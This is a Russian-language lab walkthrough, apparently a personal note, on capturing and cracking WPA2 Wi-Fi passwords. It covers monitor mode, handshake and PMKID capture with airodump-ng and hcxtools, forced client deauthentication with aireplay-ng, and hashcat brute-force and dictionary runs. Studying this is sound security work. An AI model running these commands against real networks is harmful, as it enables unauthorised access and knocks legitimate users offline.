###### tags: `Wi-Fi` `Brute-force` # Перехват и брутфорс Handshake `Необходима wifi-карта, поддерживающая режим мониторинга. (к прим. Realtek RTL8812AU AC1200)` Смотрим оборудование wlan0: ![](https://i.imgur.com/ae1dsnK.png) Смотрим какое есть usb оборудование: ![](https://i.imgur.com/e8d6jYc.png) Смотрим pci-устройства: ![](https://i.imgur.com/RNObe3w.jpg) Включаем по ethernet: ![](https://i.imgur.com/D11vVeR.png) Переводим в режим мониторинга карточку: ``` airmon-ng start wlan0 ``` ![](https://i.imgur.com/0DPnWdS.png) ``` ip a ``` ![](https://i.imgur.com/jQn4IMx.png) Смотрим, какие есть сетки: ``` airodump-ng wlan0mon ``` ![](https://i.imgur.com/eaMjV9M.png) Слушаем канал 1 (Mikrotik-2.4Ghz): ``` airodump-ng wlan0mon --channel 1 ``` К микроту поключена точка доступа ![](https://i.imgur.com/gI5jFKu.png) Сопоставим какие устройства подлючены к этой точке: ``` airodump-ng wlan0mon ``` ![](https://i.imgur.com/FhXZpVJ.png) ``` nano bssid > два bssid копируем в файл ``` ![](https://i.imgur.com/totfCEV.png) ``` mkdir CSB-4n cd CSB-4n airodump-ng wlan0mon --channel 1 -w dump-1 ``` Поймали хендшейк подключившегося устройства: ![](https://i.imgur.com/xDvzCpx.png) ![](https://i.imgur.com/FEo1IEl.png) #####Деаутентификацию клиентов делаем (hackware.ru) ![](https://i.imgur.com/mTPqhgx.png) ``` aireplay-ng -0 10 -a MAC -c MAC ``` ![](https://i.imgur.com/gXRHgIp.png) Получили хендшейк нового клиента: ![](https://i.imgur.com/Ti1Icdw.png) #hashcat.net/cap2hashcat/ подбираем: ![](https://i.imgur.com/9qYZwT3.png) ?d - один символ в пароле; ![](https://i.imgur.com/jUdkoUa.png) # Перехват и брутфорс PMKID https://telegra.ph/Vzlamyvaem-WiFi-s-pomoshchyu-PMKID-11-15 https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-passwords-using-new-pmkid-hashcat-attack-0189379/ ``` apt install hcxdumptool apt install hcxtools airodump-ng wlan0mon ``` Появился prism0: ![](https://i.imgur.com/pAteSmE.png) ![](https://i.imgur.com/CjuNz6j.png) Ждем пока появится PMKID (кто-то зайдет к примеру в сеть нашу): ![](https://i.imgur.com/1QCvVv8.png) ``` hcxpcaptool -E essidlist -I identitylist -U usernamelist -z pmkid.16800 pmkid.pcapng ``` Брутим по словарю: ``` hashcat -m 16800 pmkid.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt' ``` либо так: ![](https://i.imgur.com/RiyQ9Gz.png) Взломано: ![](https://i.imgur.com/hqfilJ2.png)